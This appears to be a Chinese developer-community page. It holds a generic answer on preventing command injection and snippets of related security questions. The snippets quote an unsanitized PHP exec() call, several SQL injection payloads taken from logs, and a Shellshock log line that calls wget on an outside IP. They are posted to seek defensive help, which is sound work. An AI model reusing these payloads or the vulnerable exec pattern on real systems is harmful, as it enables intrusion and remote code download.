此代码如何易受命令注入CWE 7的攻击?
代码易受命令注入CWE 7攻击的原因是未对用户输入进行充分的验证和过滤,导致恶意用户可以通过注入恶意命令来执行非法操作。以下是一些可能导致代码易受命令注入攻击的常见原因和防范措施:
- 直接拼接用户输入:如果代码将用户输入直接拼接到命令中,而没有对输入进行过滤和验证,攻击者可以通过注入特殊字符或命令来执行恶意操作。为了防止注入攻击,应该使用参数化查询或预编译语句来构建命令,确保用户输入不会被当作命令的一部分。
- 不安全的解析器:某些解析器对于特殊字符的处理可能存在漏洞,攻击者可以利用这些漏洞来注入恶意命令。为了防止这种情况,应该使用安全的解析器,并及时更新解析器的版本以修复已知的漏洞。
- 不安全的文件操作:如果代码使用用户输入来构建文件路径或文件名,并且没有对输入进行充分的验证和过滤,攻击者可以通过注入特殊字符来访问或篡改系统中的文件。为了防止这种情况,应该使用安全的文件操作函数,并对用户输入进行严格的验证和过滤。
- 不安全的数据库操作:如果代码将用户输入直接拼接到SQL查询语句中,而没有对输入进行过滤和验证,攻击者可以通过注入特殊字符来执行SQL注入攻击。为了防止这种情况,应该使用参数化查询或预编译语句,并对用户输入进行严格的验证和过滤。
- 不安全的远程命令执行:如果代码使用用户输入来构建远程命令执行的参数,并且没有对输入进行充分的验证和过滤,攻击者可以通过注入特殊字符来执行远程命令执行攻击。为了防止这种情况,应该使用安全的远程命令执行函数,并对用户输入进行严格的验证和过滤。
总之,为了防止命令注入攻击,开发人员应该始终遵循安全编码的原则,对用户输入进行充分的验证和过滤,使用安全的编程语言特性和函数,避免直接拼接用户输入到命令中,及时更新和修复已知的漏洞。此外,定期进行安全审计和漏洞扫描也是保护代码免受命令注入攻击的重要措施。
关于腾讯云相关产品和产品介绍链接地址,由于要求不能提及具体品牌商,建议您访问腾讯云官方网站,了解他们的云安全产品和解决方案。
相关·内容
1回答
要在客户端浏览器中打开pdf文件,我使用以下服务器端C#代码
context.Response.BinaryWrite(byteArray);
现在的问题是,Veracode在这一行上出现了XSS缺陷(CWE 80)。
有人能帮我解决这个缺陷吗?
浏览 0提问于2013-09-12得票数 0
回答已采纳
1回答
我在下面的网站上做这个简单的教程:
他们使用的代码是安全的,还是黑客可能以某种方式进入?
谢谢
PS:如果有问题,它们是什么,我如何防止它们。有没有更好的教程?
浏览 1提问于2011-05-06得票数 0
回答已采纳
我的前端javascript中有以下代码,它基本上读取csrf cookie值,并在通过jquery完成的ajax调用中设置它。
var csrftoken = self.getCookie('csrftoken');
xhr.setRequestHeader("X-CSRFToken", csrftoken);
这似乎是一种非常标准的技术,但Veracode将其报告为一个漏洞。
查看这种漏洞的详细信息,在https://cwe.mitre.org/data/definitions/113.html,我不认为这是一个问题,因为http头是从客户端
浏览 0提问于2020-01-06得票数 2
我有以下PHP代码:
if(isset($_GET["href"]) && isset($_GET["name"])) {
exec("cvlc " . $_GET["href"] . " &");
}
href绝对是一个有效的URL,并且exec函数也被调用(我通过echo尝试过),当我将cvlc命令输入控制台时,cvlc命令也可以正常工作,但是一旦我通过浏览器运行它,它就会永远加载。
exec命令也运行良好,我刚刚测试了它。
编辑:我试图播放的网址是,但我也尝试了其他一些。
谢
浏览 3提问于2017-05-22得票数 0
3回答
我刚在日志中发现有人试图执行这个SQL注入。
/commands.php?id=-1+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a
有人知道他/她想做什么吗?有效吗?有人知道怎么破译那些六角线吗?
浏览 0提问于2012-07-11得票数 0
回答已采纳
1回答
我的代码:
try{ Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/lentele", "root", "");
String select = "SELECT * FROM darbuotojai WHERE 1";
String ID = infoID.getText();
String Vardas = inf
浏览 1提问于2015-12-21得票数 1
1回答
我在我构建的一个小型的PHP/MySQL论坛中使用。我的问题:
是否可以将用户创建的HTML保存在数据库中,然后在我的应用程序中重新显示?我应该采取什么预防措施来保护我的论坛的用户不受脚本注入之类的影响呢?使用BBCode会比使用BBCode更安全吗?我尝试过ckeditor插件,但是它缺少一些基本的格式,比如文本对齐.有人知道如何扩展插件以增加文本对齐吗?
浏览 6提问于2011-08-29得票数 5
回答已采纳
1回答
我有一个WPF应用程序,它可以与SQL Server建立连接以检索数据。
如果用户不使用集成安全性,则可以在TextBox中写入服务器的名称以及用户名和密码。连接字符串是使用输入构建的:
public string GetConnectionString(string name, string server, bool isWindowsAuth = false, string user = null, string password = null)
{
string connectionMode = "";
if(isWindo
浏览 19提问于2019-11-21得票数 0
回答已采纳
4回答
注入的定义
SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序,其中恶意SQL语句被插入入口字段以执行(例如将数据库内容转储给攻击者)。
SQL注入如何影响AndroidO.S
安卓应用程序中使用的SQLite是功能齐全的数据库,因此就像Server或MySQL框一样,它们也容易受到SQL注入的影响。SQL注入通常通过将数据添加到查询字符串或在表单字段中添加数据来工作;允许黑客访问数据库或未经授权的登录。SQL注入通常用于攻击Web视图或web服务,但也可用于攻击活动。
SQL注入漏洞的根本原因是使用动态或连接SQL查询。如果SQL查询是通过连接用户提供的输入来构造的,则用户可以提供S
浏览 2提问于2015-05-22得票数 5
1回答
我正在生成一个名为keywords[]的元素li列表,我希望在mySQL DB中存储每个单独的li值。在我的当前代码中,我总是在keyword列中使用"Array“创建一行。这就是db:上的样子。
我如何循环每个li元素并将每个值存储在不同的行中?谢谢您抽时间见我。
add s.php
</p>
<div class="add">
<label for="keywords">Keywords : </label>
<input type="te
浏览 0提问于2019-08-27得票数 0
1回答
漏洞描述ApacheHTTPServer2.2.x到2.2.21在构造Bad (又名400)错误文档时没有正确限制标头信息,该错误文档允许远程攻击者通过涉及(1)长或(2)格式错误的标头和精心编制的web脚本的向量获取HTTPOnly cookie的值。如何利用"Apache泄露“?
浏览 3提问于2015-02-21得票数 0
2回答
我有网站如ASP.net作为前端和SQL Server2005作为后端。但是我在我的后端面临着一个非常奇怪的SQL注入。一些类型的CSS与HTML垃圾网站追加他们的代码到我的网站数据库与每个表和每个varchar类型的列。例如
</title><style>.acoi{position:absolute;clip:rect(439px,auto,auto,439px);}</style><div class=acoi>Apply here <a href=http://gogopaydayloans.com>payday loans&
浏览 0提问于2013-06-10得票数 0
1回答
我希望在ruby中动态地向变量添加约束。我正在从一个文件中读入一个基本的类规范,它定义了类名、属性以及与属性相关的任何约束。例如,它可能是:
Class: Car
Attributes: model, String
Attributes: price, Fixnum
Constraint: model, model != nil
Constraint: price, price > 0
因此,我编写了下面这行代码来创建类,并为属性编写attr_accessors:
eval('class ClassName; attr_accessor:var_1; def test() pu
浏览 0提问于2015-05-17得票数 0
1回答
所以我收到了这个警告,但我不知道如何修复它。它用于我的数据库连接文件。
Warning: require(includes/connect.inc.php): failed to open stream: No such file or directory in /customers/5/e/6/gixter.dk/httpd.www/index.php on line 4 Fatal error: require(): Failed opening required 'includes/connect.inc.php' (include_path='.:/usr/sh
浏览 0提问于2016-07-05得票数 0
1回答
<AjaxPro.AjaxMethod(AjaxPro.HttpSessionStateRequirement.Read)> _
Public Function HandleSelect(ByVal table As String, ByVal eventSource As String, ByVal filterValue As String, ByVal targetControl As String) As StreetNameResponse
Dim tName As TableName
Dim filter As String = Nothing
浏览 0提问于2012-01-31得票数 0
回答已采纳
1回答
如何通过expression.Here在组中传递变量是我的代码。从@Varientsku,我想传递列名
Create Proc spIsUnique
@varientsku nvarchar(max) output
As
Begin
select @varientsku,
IIf (count(*)>1,'Dublicate','True') as Total from product group by
@varientsku
End.
我得到了这个错误。每个组按表达式必须至少包含一个不是外部引用的列。帮我解决这个问题
浏览 0提问于2018-01-15得票数 2
回答已采纳
我有一些JavaScript,它从PHP脚本中获取一些HTML,并将其插入DOM中:
$.get("/includes/blocks.php",{
id:encodeURIComponent(id)
}).done(function(Data){
$(''+Data.html+'').appendTo('.main');
});
如果我想将blocks.php代码插入到DOM中,那么防止XSS的最佳方法是什么?它包含了大量具有大量属性的HTML元素。没有用户控制的数据被返回,但是返回的数据可以被修改吗?
浏览 0提问于2018-04-12得票数 0
回答已采纳
2回答
我在日志中反复看到一个奇怪的url,我想知道是否有人能够理解这个用户试图做什么。我有点熟悉MySQL的基础知识,但是,我对这个部分(特别是0x7e部分)感到迷茫,并希望防止将来可能出现的漏洞。我已经发现并正在纠正我的脚本中的漏洞,但是我真的很想知道这个人在做什么。您所能提供的任何见解都将不胜感激。谢谢。
注意:我用DatabaseName.TableName替换了下面的实际数据库和表名,以使其更加清晰。
这是一个奇怪的网址:
photo.php?member_id=11616%27+AND+(SELECT+7509+FROM(SELECT+COUNT(*),CONCAT(0x7e,0x7e,
浏览 3提问于2014-02-19得票数 2
回答已采纳
2回答
参数化字符串等和通配符运算符
、、、、
在我的搜索中,我看到了在SQL查询中使用参数化字符串,形式如下:
SqlCommand comm = new SqlCommand();
comm.CommandText="SELECT * FROM table WHERE field LIKE '%'+@var+'%'";
comm.Parameters.AddWithValue("var","variabletext");
SqlDataReader reader = comm.ExecuteReader();
然而,在这个论坛中提到,尽管它是在参数化字符串中
浏览 3提问于2012-10-31得票数 4
回答已采纳
我使用以下代码使用全文索引进行搜索。
$query = $this->Posts->find()
->contain(['Categories' ])
->where([
'MATCH(Posts.title) AGAINST(? IN BOOLEAN MODE)' => $search
]);
但是我得到了下面的错误
SQLSTATE[HY093]: Invalid parameter number: mixed named and positional parameters
请指教
提前感谢!
浏览 5提问于2015-12-18得票数 2
回答已采纳
我在控制器中编写了以下代码:
$this->redirect('https://example.com' . $this->here);
它有头注入吗?
ex) http://example.com/%0dSet-Cookie:XXXX=YYYYY
请告诉我怎么修。
浏览 3提问于2011-11-10得票数 1
当我调查谷歌的结果时,软件漏洞“硬编码密码”(cwe-798 & cwe-259)是IoT设备的软件(参见:link1)和厚客户端软件(参见:link2,link3)的漏洞。当密码嵌入到这两种类型的软件中时,可以通过反编译来揭示密码。作为一个攻击者,这个弱点可以被利用,因为我们掌握着软件的二进制代码。
但是网络应用呢?我是说服务器端软件。在web应用软件中,作为攻击者,二进制代码并不掌握在我们手中。因为它不是客户端软件。这是服务器端软件。那么,对于web应用软件来说,硬编码密码漏洞仍然是一个有效的漏洞吗?或者这个漏洞只是针对IoT和厚客户端软件?
注意: CWE关于此漏洞的网页(cwe
浏览 0提问于2023-01-01得票数 0
回答已采纳
1回答
我查看了日志,发现了一个sql注入。看起来它用得很多,但我真的不明白它是如何工作的。我试图通过他们提交的表单提交它,但没有任何反应。
注入字符串为:
(select(0)from(select(sleep(0)))v)/*''+(select(0)from(select(sleep(0)))v)+''"+(select(0)from(select(sleep(0)))v)+"*/
不知道他们是怎么注射的。据我所知并没有影响服务器。他们没有得到任何数据。但我还是想知道他们是怎么做到的。
浏览 0提问于2015-07-28得票数 4
黑客如何设法将恶意代码输入到web应用程序和大多数网站?我想说的是,很少有网站有JavaScript函数eval()在他们的网站代码。
浏览 0提问于2019-05-05得票数 0
我有使用loadXML函数(以及其他XML函数)的PHP代码。
loadXML函数易受XXE攻击吗?也就是说,如果XML包含外部实体,那么它们会被解释吗?
此函数易受其他基于XML的攻击吗?比如,十亿人笑DoS攻击?
您能给我介绍一下易受XXE攻击和其他XML相关攻击的函数列表吗?
我知道,通过更改设置,可以轻松阻止PHP中的XXE攻击。不过,我很乐意就我提出的问题找到答案。
浏览 0提问于2016-08-15得票数 12
回答已采纳
有人能告诉我这段代码是如何得到输入的,以及这段代码如何容易受到缓冲区溢出的弧注入的影响吗?
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
将大小设置为65
enum {SIZE = 65};
我试图改变的变量
int True = 0;
char name[SIZE];
FILE *f;
int i = 0;
如何从文件中读取?
void read(char *s) {
int c;
char buffer[SIZE];
浏览 3提问于2014-05-04得票数 2
回答已采纳
我刚从WebGoat开始。在他们的GitHub页面[https://github.com/WebGoat/WebGoat]上,他们发布了以下警告:
WARNING 1: While running this program your machine will be
extremely vulnerable to attack. You should to disconnect
from the Internet while using this program. [sic]
这是什么意思?我天真的理解是,这是在本地主机上运行的,那么漏洞在哪里?
P.S.:如果你能解释一下这件事就更好了,因为
浏览 0提问于2015-06-16得票数 5
回答已采纳
2回答
在nginx访问日志中有很多条目,如下所示。我如何知道这些脚本的结果,以及我的服务器是否被破坏?
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/
浏览 0提问于2016-01-14得票数 1
回答已采纳
在Mysql 5.0以上版本的普通SQL查询中
Select A, B FROM table where id =1
如果攻击者为id参数注入1- sleep (10),为什么数据库会休眠?连字符在这里的作用是什么?它不是无效的语法(整数和函数的算术运算)吗?
浏览 0提问于2018-06-28得票数 3
不允许通过潜在的危险操作使用受污染的数据。它的级别各不相同,0表示禁用,然后1-4表示安全级别。启用安全模式时,可能存在哪些漏洞?您是否知道在启用安全模式时向ruby程序发出的任何CVE号?启用安全模式后,可能会有哪些 (或cwe系列)?
浏览 0提问于2010-08-06得票数 9
回答已采纳
如果我用桌面PC加载我的站点,我相信一切都很好,我可以让SSL按其应有的方式工作:
但是如果我在Galaxy S4手机或Nexus 7平板电脑上使用Chrome浏览它,我会发现SSL错误--为什么会这样,以及如何修复它呢?
浏览 3提问于2015-07-01得票数 1
所以我刚刚注意到我的一个表已经被删除/删除了,我使用的是MySQL,我可以跟踪或看到这个日志吗?
我不知道从哪里开始找。
浏览 0提问于2013-10-28得票数 2
回答已采纳
2回答
下面是我的代码:
import pymysql
import pymysql.cursors
# ...
for w in aList:
param = w
cursor.execute("SELECT * FROM test where text like %(p)s", {"p": "%%{}%%".format(param)})
result_set = cursor.fetchall()
for row in result_set:
print(row)
我没有得到任何执行,也没有错误。
与本站点上的类似问题
浏览 16提问于2017-11-27得票数 1
我正在尝试开发一些应用程序,并使用checkmarx扫描我的代码,并在下面的方法中得到了- LDAP注入下的问题。
Update(request.getparameter("userID"))
我们调用此方法并使用request.getparameter()获取相应的值,checkmarx在request.getparameter("userID")中显示问题,
问题描述是“该元素的值随后在代码中流动,而不经过适当的净化或验证,并最终在方法中的LDAP查询中使用。”
所以下面是我尝试的方法之一
String userID = request.getparamet
浏览 3提问于2017-01-02得票数 1
1回答
有一个站点的主页采用http://example.com/index.php?page=1格式。它包含一个带有文本的矩形框。我可以使用哪些漏洞来查找此站点上的隐藏文件?
我试过:
1)将另一个数字或ASCII字符串替换为1。它产生相同的矩形帧,但没有文本。我也试着把一个非常大的数字和UTF-8字符太,结果是一样的。我得到的是同样的画面。
2)检查了页面的源代码。没有结果。
浏览 0提问于2018-09-12得票数 -4
回答已采纳
4回答
我必须做一个关于如何进行MySQL注入以及如何保护我们免受它们的攻击的小演示。我已经确切地知道如何保护我们的应用程序,但我对SQL注入有一些疑问。
A为演示创建了一个简单的虚拟网站,我在其中添加了一个搜索字段。此搜索字段不受保护,因此会受到SQL注入的影响。
我已经做了一些例子,比如如何检索数据库的一些全局信息(版本、当前用户、数据库名称),插入一个" 'UNION SELECT [MyInteresstingFields] From [mytable]; --",但我的问题是:
下一步是什么?可以更改数据库吗?多么?我不明白,因为mysql_query(它是一个使用c
浏览 0提问于2011-07-21得票数 2
回答已采纳
3回答
我不确定这是不是正确的方法,但我将此函数用于输入。例如,联系人表单:
RemoveXSS(mysql_real_escape_string($_POST['input']))
但通过扫描,结果如下:
Parameter Name: Query Based
Parameter Type: FullQueryString
Attack Pattern: /"ns="alert(0x00058B)
当点击上面的url时,我看不到页面中的任何东西。但是,我的代码中存在一些错误。
/
function RemoveXSS($val)
{
$val = preg_r
浏览 0提问于2010-06-30得票数 4
回答已采纳
我正在一个网站上进行渗透测试。大多数请求是在后台通过post请求执行的。当我使用Live报头截获一个请求并使用与原始请求相同的参数重放它时,错误发生后(但是原始请求成功了):
Database Error
错误: SQLSTATE23000:完整性约束违反: 1048列's_id‘不能为null
SQL查询:插入到a2.user_s_likes (s_id、user_id、status、added_on)值(NULL,924300,NULL,'2016-09-01 13:28:29')
注意:如果您想自定义此错误消息,请创建app/View/ error /pdo_er
浏览 0提问于2016-09-01得票数 2
据我所知,在非对称密钥中有公钥和私钥。例如:
步骤1: Alice和Bob获得公共号码P= 23,G=9
步骤2: Alice选择了私钥a=4,Bob选择了私钥b=3
步骤3: Alice和Bob计算公共值Alice: x =(9^4 mod 23) = (6561 mod 23) =6 Bob: y= (9^3 mod 23) = (729 mod 23) = 16
第四步: Alice和Bob交换公共号码
步骤5: Alice接收公钥y =16,Bob接收公钥x=6
步骤6: Alice和Bob计算对称键Alice: ka = y^a mod p= 65536 mod 23 =9 Bob=
浏览 0提问于2018-11-27得票数 1
回答已采纳
我有一个用ASP.NET MVC构建的应用程序。我的观点是使用Razor。我的一个视图被导航到使用url,如下所示:
http://localhost:5001/find?s=You%27re
我需要获得查询字符串参数s的友好版本。要做到这一点,我目前在我的ASP.NET MVC视图的底部有以下内容:
<script type="text/javascript">
var s = '@HttpUtility.UrlDecode(Request.QueryString["s"])';
alert(s);
</script&
浏览 0提问于2014-12-15得票数 1
回答已采纳
2回答
假设您使用以下SQL查询创建一个名为notes的表并在其中存储数据: CREATE TABLE notes (
id INTEGER PRIMARY KEY,
username TEXT,
token TEXT,
text TEXT
);
INSERT INTO notes (username, token, text) VALUES ('alice', 'token-a', 'Reminder: buy milk');
INSERT INTO notes (username, token, text) VALUES ('alice&#
浏览 27提问于2020-08-28得票数 0
如果我使用的是一个没有安全协议的不安全无线网络,并且试图连接到我加密的网上银行网站,那么在这种情况下,正在监听无线网络的攻击者会看到我的密码吗?
如果我与网站的连接是使用SSL/TLS加密的,那么攻击者如何才能看到它?
浏览 0提问于2015-10-12得票数 1
回答已采纳
我想知道是否有可能将sql查询注入过程参数。我有特殊情况:
ALTER PROCEDURE [Test].[Injection]
@Query varchar(250) = null
AS
SET NOCOUNT ON
SET @Query = REPLACE(@Query,'','') COLLATE Latin1_General_CI_AI
... more sql code
SELECT * FROM Customers
WHERE (@Query IS NULL OR (Name COLLATE Latin1_General_CI_AI like &
浏览 0提问于2018-08-02得票数 0
回答已采纳
我编写了一个数据包嗅探器,它成功地拦截了从服务器发送到我计算机的所有数据包。问题是数据包是加密的(当然),我需要对它们进行解密。我的数据包嗅探器捕获的数据包的一个例子是:
28-A0-D0-D3-00-23-3F-B5-00-16-79-1C-4F-CB-28-29-61-CC-DF-CF-05-57-43-BF-09-B2-E9-EA-CD-3C-85-FD-9C-41-07.
我知道28-A0是源端口,D0-D3是目标端口,00-23是长度,3F-B5是校验和。所以我相信实际的数据是在00之后开始的。
有另外一个数据包嗅探器用于这个目的,它不仅记录数据包,而且将其解码成可读格式,这正是我想
浏览 0提问于2016-02-28得票数 0
回答已采纳
谁能给我指出一个小的c应用程序的方向,它是已知的易受模糊攻击的(我将使用zzuf对其进行模糊处理),它有可用的源代码,并且很容易安装在Ubuntu上。非常感谢
浏览 1提问于2012-07-20得票数 2
2回答
我需要帮助。
假设我使用sql注入方法获取网站的数据库名称,并设法从表中获取所有数据,那么是否可以在不使用基本sql客户端标识服务器上的情况下更改该数据?
谢谢。
(我更希望所有数据库类型的答案都是通用的,但如果不是,所讨论的数据库版本是mysql)
浏览 3提问于2014-09-28得票数 0
回答已采纳
2回答
我的老板在10年前写了这个非常复杂的软件,并要求我在我刚刚在VPS上安装的一个新的IIS 7服务器上迁移它。我设法使一切顺利工作,除了一个很小的循环超时,并将CPU 100%。
罪魁祸首是:
rs_ss.open "SELECT DISTINCT idMC, idUtente, Categoria FROM forte01.RisorseS WHERE idmc=" & request.querystring("idmc") & " and idutente=" & session("idutente")
浏览 3提问于2013-10-23得票数 1
回答已采纳
我是stackoverflow的新手,并且找不到我的问题的答案,我的问题是:我如何在php中保护我的mail()代码,以防止人们添加密件抄送,这最终会导致群发邮件?我的网站使用PHP mail()服务在我的网站中输入新评论时向我发送电子邮件。什么是最好的方法来防止人们篡改它,例如删除密件抄送?到目前为止,我所拥有的是:
function mres($input){
if (get_magic_quotes_gpc()){
$input = stripslashes($input);
}
return mysql_real_escape_string($input);
}
$name =
浏览 3提问于2012-09-08得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
